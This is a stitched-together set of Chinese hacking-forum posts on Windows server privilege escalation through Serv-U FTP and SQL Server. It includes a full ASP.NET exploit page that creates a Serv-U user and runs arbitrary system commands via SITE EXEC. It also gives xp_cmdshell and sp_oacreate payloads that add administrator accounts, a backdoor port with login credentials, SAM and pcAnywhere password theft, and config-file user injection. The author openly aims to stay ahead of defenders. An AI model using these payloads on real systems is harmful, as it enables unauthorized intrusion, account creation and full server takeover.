Serv-u7提权

一，su7是提权有几种方式？

有两种形式去干掉su7 ftp服务器。
1>，登陆管理员控制台的页面
==>获取OrganizationId，用于添加用户
==>获取全局用户的“下一个新用户ID”
==>添加用户
==>添加用户的权限 or 添加全局用户权限
==>用户登陆
==>执行系统命令添加系统账户。

2>，登陆管理员控制台页面
==>基本WEB客户端
==>来到serv-u的目录下–users–Global user目录
==>上传一个你已经定义好的用户文件
==>用户登陆
==>执行系统命令添加系统账户
而本文件使用了第一种方法。

二，提权的原理？

Su7的管理平台是http的，很先进。
抓包，分析，发现了以下路程是可以利用的。
1.管理员从管理控制台打开web页面时，是不需要验证密码的。
2.管理员如果用某URL打开web页面时，虽然需要输入密码，但是无论输入什么，都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”
3.管理员可以添加用户有两种，一种是全局用户，一种是某个域下的用户。而权限设置也是两种，一种是全局，一种是针对用户。
4.管理员添加了用户的这个包和设置权限这个包，是分开的。
所以，我可以抓包然后转换成php的socket连接post出去。
最后在用经典的ftp登陆，exec命令。达到提权。
在写php的过程中，遇到很多问题，比如函数不会用等等（—_—!以前没学过php），感谢“云舒牛”帮忙。。。
在分析包的流程，发现了一些特征，服务器返回的数据，全是以xml格式发来的。而在数据传输的过程中，设计的很经典。
Su7也有自己的数据库，他也会自己生成一个id。
这个ID是随机的，在你创建用户时，会先请求服务器生成一个，生成好后，修改该id的用户名，密码等。
这很像oracle的insert手段。

写工具的过程中，遇到很多麻烦，最大的麻烦就是这个ID问题，后来分析出来了。
添加权限时，也是可以利用这个ID的。
于是工具一共连接了6次服务器，这几次分别是：
1.用来登陆平台，使用那个输入任何密码都可以登陆的页面地址。返回一个sessionid，这个sessionid在以后的包都用到了。
2.获取OrganizationId，用于添加用户
3.用来请求一个用户ID。
4.修改该ID的登陆用户名，密码。
5.修改该ID的权限，加c盘的写删执行等。
6.这次连接是做坏事的，使用前面添加的用户执行系统命令。

三，为啥我明明显示成功了，但是却提不上去？

这要看错误代码了，这里偶很惭愧，并没有写详细的错误代码判断。
一般有以下几种情况：
1，可能是因为管理员密码不对。
参照管理员密码的连接。
2，可能是因为管理员限制了执行SITE EXEC。
有待程序修改，程序可以加一个让他不限制的功能。
3，可能是程序问题。
4，为啥作者有这么多理由不去改？
你没发现么？一旦把东西做完美了，那比较系统的防御方案就出来了。
如果不完美，让他以为我们就这点手段，防御系统也会这么认为。
不信的话，过段时间，防御方案出来了，肯定有一条：“修改site exec为不可访问”。
到时候，我再写个功能，把这玩意改回来就是。
所以，等大家都提倡要XXXX的时候，我再解决XXXX的问题。大家先这么玩着吧:)

四，关于管理员密码

默认为空，如果密码为空，填什么都能进去。
如果修改过，管理员密码默认会在这里：
C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive
文件中找到一个MD5密码值。
C:\Program Files\RhinoSoft.com\Serv-U
是su的根目录。
密码值的样式为(假设是123456)
kx#######################
#代表123456的32位MD5加密，而kx则是su对md5的密码算法改进的随机2位字符。
破解后的密码为kx123456，去掉kx就是密码了。
你可以针对这个加密生成字典。

收藏、分享这篇文章!

ftp命令

在获得服务器FTP管理员后可以用quote site exec命令来添加系统管理员,cmd下操作方法如下:quote site exec net user 用户名 密码 /add 添加一个用户

quote site exec net localhost administrators 用户名 /add 把用户添加到系统管理员组

quote site exec tskill PID 在 Windows 2003 中通过 PID 关闭进程

quote site exec tskill notepad 在 Windows 2003 中通过名称关闭同类的进程

quote site exec net stop iisadmin 停止 iis 服务

quote site exec net start iisadmin 启动 iis 服务

收藏、分享这篇文章!

原文地址:http://bbs.77169.com/read-htm-tid-239508-fpage-5.html

1.看命令行组件是否存在wscript.shell

2.看系统版本，权限大就直接在C盘看，cmd下，set命令看下就OK！windows的为03，WINNT的为2000

3.看系统的FTP是否是SEVR-U,看sevr-u版本,cmd下ftp www.xxx.com，当然也有改了的，可以在webshell里扫下43958（小敲门：扫下65500，ftp提权的后门，可以用ftp www.xxx.com 65500进去，账号go，密码od）

4.存在命令行组件，并且是03系统，先看下是否支持aspx，aspx里面不需要命令行组件的噢..用Churrasco.exe溢出即可….不能溢出，试试nc反弹个cmdshell，权限可能会大点！

5.上传cmd.exe，首选目录回收站C:\RECYCLER\，备选目录，C:\Documents and Settings\All Users\Documents\，C:\Inetpub\，网站目录！

6.执行命令，cmd路径选择上传后的路径，如：C:\RECYCLER\cmd.exe！添加用户格式：C:\RECYCLER\Churrasco.exe “net user 账号 密码 /add” | C:\RECYCLER\Churrasco.exe “net localgroup administrators 用户 /add”

7.sevr-u提权，，端口43958，webshell自带一个SU-FTP通杀那个就是，然后cmd下，ftp www.xxx.com 如果能够用添加的ftp用户登录上去，那么执行quote site exec net user 用户 密码 /add 和quote site exec net localgroup administrators 用户 /add ，就行！

8.mysql提权，在网站目录寻找conn.asp web.config 之类的网站配置文件，如果网站是mysql架设，里面会有明文账号密码，得看运气了，可能有添加用户权限！

9.查看系统终端端口（默认3389），有命令行情况下，首先执行命令Tasklist/SVC查看服务进程PID值，TermService对应的PID值即终端端口PID值，然后用netstat -ano命令查看端口对应的PID值，跟TermService服务PID值对应下就可以找出终端端口，无命令行情况下可以用读取注册表来得到，前提是有一定权限，HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Wds\rdpwd\Tds\tcp键值PortNumber读取注册表，aspx权限大点，读取几率很高！

10.开启系统终端端口，有命令行情况，上传3389.exe（03系统）执行如：C:\RECYCLER\Churrasco.exe ” C:\RECYCLER\3389 0 3389″ 前一个3389是是文件名，后一个3389是终端端口！如果修改过终端端口，那么后一个3389就也需要修改！sevr-u也同样可以，quote site exec C:\RECYCLER\3389 0 3389 ！执行木马一样！

收藏、分享这篇文章!

2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）
恢复方法：查询分离器连接后,
第一步执行：sp_dropextendedproc “xp_cmdshell”
第二步执行：sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
然后按F5键命令执行完毕

3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法：查询分离器连接后,
第一步执行:exec sp_dropextendedproc ‘xp_cmdshell’
第二步执行:exec sp_addextendedproc ‘xp_cmdshell’,'xpweb70.dll’
然后按F5键命令执行完毕

四.终极方法.
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add’

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add’

xp或2003server系统:

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net user 新用户 密码 /add’

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add’

收藏、分享这篇文章!

‘
‘ Love, Where are you ?

Sub BTN_Start_Click(sender As Object, e As EventArgs)
Dim Usr As String = Text_Name.Text
Dim pwd As String = Text_PWD.Text
Dim Port As Int32 = Text_Port.Text
Dim Command As String = Text_cmd.Text

Dim LoginUser As String = “User ” & Usr & vbcrlf
Dim LoginPass As String = “Pass ” & pwd & vbcrlf
Dim NewDomain As String = “-SETDOMAIN” & vbcrlf & “-Domain=cctv|0.0.0.0|43859|-1|1|0″ & vbcrlf & “-TZOEnable=0″ & vbcrlf & ” TZOKey=” & vbcrlf
Dim DelDomain As String = “-DELETEDOMAIN” & vbcrlf & “-IP=0.0.0.0″ & vbcrlf & ” PortNo=43859″ & vbcrlf
Dim NewUser AS String = “-SETUSERSETUP” & vbcrlf & “-IP=0.0.0.0″ & vbcrlf & “-PortNo=43859″ & vbcrlf & “-User=lake” & vbcrlf & “-Password=admin123″ & vbcrlf & _
“-HomeDir=c:\\” & vbcrlf & “-LoginMesFile=” & vbcrlf & “-Disable=0″ & vbcrlf & “-RelPaths=1″ & vbcrlf & _
“-NeedSecure=0″ & vbcrlf & “-HideHidden=0″ & vbcrlf & “-AlwaysAllowLogin=0″ & vbcrlf & “-ChangePassword=0″ & vbcrlf & _
“-QuotaEnable=0″ & vbcrlf & “-MaxUsersLoginPerIP=-1″ & vbcrlf & “-SpeedLimitUp=0″ & vbcrlf & “-SpeedLimitDown=0″ & vbcrlf & _
“-MaxNrUsers=-1″ & vbcrlf & “-IdleTimeOut=600″ & vbcrlf & “-SessionTimeOut=-1″ & vbcrlf & “-Expire=0″ & vbcrlf & “-RatioUp=1″ & vbcrlf & _
“-RatioDown=1″ & vbcrlf & “-RatiosCredit=0″ & vbcrlf & “-QuotaCurrent=0″ & vbcrlf & “-QuotaMaximum=0″ & vbcrlf & _
“-Maintenance=System” & vbcrlf & “-PasswordType=Regular” & vbcrlf & “-Ratios=None” & vbcrlf & ” Access=c:\\|RWAMELCDP” & vbcrlf
Dim Quit As String = “QUIT” & vbcrlf
Dim MAINTENANCE As String = “SITE MAINTENANCE” & vbcrlf

‘Dim client As New TcpClient
Dim tcpClient As New TcpClient()
Try
tcpClient.Connect(“127.0.0.1″, port)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient.ReceiveBufferSize = 1024
Dim networkStream As NetworkStream = tcpClient.GetStream()
Rec(networkStream)
Send(networkStream, LoginUser)
Rec(networkStream)
Send(networkStream, LoginPass)
Rec(networkStream)
Send(networkStream, MAINTENANCE)
Rec(networkStream)
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, NewDomain)
Rec(networkStream)
Send(networkStream, NewUser)
Rec(networkStream)
Dim tcpClient2 As New TcpClient()
Try
tcpClient2.Connect(“127.0.0.1″, 43859)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient2.ReceiveBufferSize = 1024
Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
Rec(networkStream2)
Send(networkStream2, “User lake” & vbcrlf)
Rec(networkStream2)
Send(networkStream2, “pass admin123″ & vbcrlf)
Rec(networkStream2)
Send(networkStream2, “site exec ” & Command & vbcrlf)
Rec(networkStream2)
tcpClient2.Close()
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, Quit)
Rec(networkStream)
tcpClient.Close()
End Sub

Sub Rec(o As Object)
If o.CanRead Then
Dim bytes(1024) As Byte
o.Read(bytes, 0, 1024)
Dim returndata As String = Encoding.ASCII.GetString(bytes)
response.Write(“out:” & returndata & “<br>”)
Else
response.Write(“What’s wrong ?”)
End If
End Sub

Sub Send(o As Object,data As String)
If o.CanWrite Then
Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
o.Write(sendBytes, 0, sendBytes.Length)
response.write(“in: ” & data & “<br>”)
Else
response.Write(“What’s wrong ?”)
End If
End Sub

</script>
<html>
<head>
</head>
<body>
<form runat=”server”>
<p>
<asp:Label id=”Label1″ runat=”server” width=”353px” forecolor=”Blue”>from Serv-U 2
admin by lake2</asp:Label>
</p>
<p>
<asp:Label id=”Label2″ runat=”server” width=”40px”>Name</asp:Label>
<asp:TextBox id=”Text_Name” runat=”server” Width=”152px”>LocalAdministrator</asp:TextBox>
<br />
<asp:Label id=”Label3″ runat=”server” width=”40px”>PWD</asp:Label>
<asp:TextBox id=”Text_PWD” runat=”server”>#l@$ak#.lk;0@P</asp:TextBox>
<br />
<asp:Label id=”Label4″ runat=”server” width=”40px”>Port</asp:Label>
<asp:TextBox id=”Text_Port” runat=”server”>43958</asp:TextBox>
<br />
<asp:Label id=”Label5″ runat=”server” width=”40px”>cmd</asp:Label>
<asp:TextBox id=”Text_cmd” runat=”server”></asp:TextBox>
</p>
<p>
<asp:Button id=”BTN_Start” onclick=”BTN_Start_Click” runat=”server” Text=”Start”></asp:Button>
</p>
<p>
<hr />
<!– Insert content here –>
</p>
</form>
</body>
</html>

收藏、分享这篇文章!

二，提权的原理？
Su7的管理平台是http的，很先进。
抓包，分析，发现了以下路程是可以利用的。
1， 管理员从管理控制台打开web页面时，是不需要验证密码的。
2， 管理员如果用某URL打开web页面时，虽然需要输入密码，但是无论输入什么，都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”
3， 管理员可以添加用户有两种，一种是全局用户，一种是某个域下的用户。而权限设置也是两种，一种是全局，一种是针对用户。
4， 管理员添加了用户的这个包和设置权限这个包，是分开的。
所以，我可以抓包然后转换成php的socket连接post出去。
最后在用经典的ftp登陆，exec命令。达到提权。
在写php的过程中，遇到很多问题，比如函数不会用等等（—_—!以前没学过php），感谢“云舒牛”帮忙。。。
在分析包的流程，发现了一些特征，服务器返回的数据，全是以xml格式发来的。而在数据传输的过程中，设计的很经典。
Su7也有自己的数据库，他也会自己生成一个id。
这个ID是随机的，在你创建用户时，会先请求服务器生成一个，生成好后，修改该id的用户名，密码等。
这很像oracle的insert手段。

写工具的过程中，遇到很多麻烦，最大的麻烦就是这个ID问题，后来分析出来了。
添加权限时，也是可以利用这个ID的。
于是工具一共连接了6次服务器，这几次分别是：
1， 用来登陆平台，使用那个输入任何密码都可以登陆的页面地址。返回一个sessionid，这个sessionid在以后的包都用到了。
2， 获取OrganizationId，用于添加用户
3， 用来请求一个用户ID。
4， 修改该ID的登陆用户名，密码。
5， 修改该ID的权限，加c盘的写删执行等。
6， 这次连接是做坏事的，使用前面添加的用户执行系统命令。

三，为啥我明明显示成功了，但是却提不上去？
这要看错误代码了，这里偶很惭愧，并没有写详细的错误代码判断。
一般有以下几种情况：
1，可能是因为管理员密码不对。
参照管理员密码的连接。
2，可能是因为管理员限制了执行SITE EXEC。
有待程序修改，程序可以加一个让他不限制的功能。
3，可能是程序问题。
4，为啥作者有这么多理由不去改？
你没发现么？一旦把东西做完美了，那比较系统的防御方案就出来了。
如果不完美，让他以为我们就这点手段，防御系统也会这么认为。
不信的话，过段时间，防御方案出来了，肯定有一条：“修改site exec为不可访问”。
到时候，我再写个功能，把这玩意改回来就是。
所以，等大家都提倡要XXXX的时候，我再解决XXXX的问题。大家先这么玩着吧:)

四，关于管理员密码

默认为空，如果密码为空，填什么都能进去。
如果修改过，管理员密码默认会在这里：
C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive
文件中找到一个MD5密码值。
C:\Program Files\RhinoSoft.com\Serv-U
是su的根目录。
密码值的样式为(假设是123456)
kx#######################
#代表123456的32位MD5加密，而kx则是su对md5的密码算法改进的随机2位字符。
破解后的密码为kx123456，去掉kx就是密码了。

收藏、分享这篇文章!

　　个人总结如下：

　　1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，得到pcAnywhere密码，登陆

　　2.C:\WINNT\system32\config进这里下它的SAM，破解用户的密码

　　c:\winnt\repaire 下是备份

　　用到破解sam密码的软件有LC，SAMinside

　　3.C:\Documents and Settings\All Users\「开始」菜单\程序 看这里能跳转不，我们从这里可以获取好多有用的信息

　　可以看见好多快捷方式，我们一般选择Serv-U的，然后本地查看属性，知道路径后，看能否跳转

　　进去后，如果有权限修改ServUDaemon.ini，加个用户上去，密码为空

　　[USER=dede|1]

　　Password=

　　HomeDir=c:TimeOut=600

　　Maintenance=System

　　Access1=C:\|RWAMELCDP

　　Access1=d:\|RWAMELCDP

　　Access1=f:\|RWAMELCDP

　　SKEYValues=

　　这个用户具有最高权限，然后我们就可以ftp上去 quote site exec xxx 来提升权限

　　4.c:\winnt\system32\inetsrv\data就是这个目录，同样是erveryone 完全控制，我们所要做的就是把提升权限的工具上传上去，然后执行

　　5.看能否跳转到如下目录

　　c:\php, 用phpspy

　　c:\prel，有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell

　　#!/usr/bin/perl

　　binmode(STDOUT);

　　syswrite(STDOUT, “Content-type: text/html\r\n\r\n”, 27);

收藏、分享这篇文章!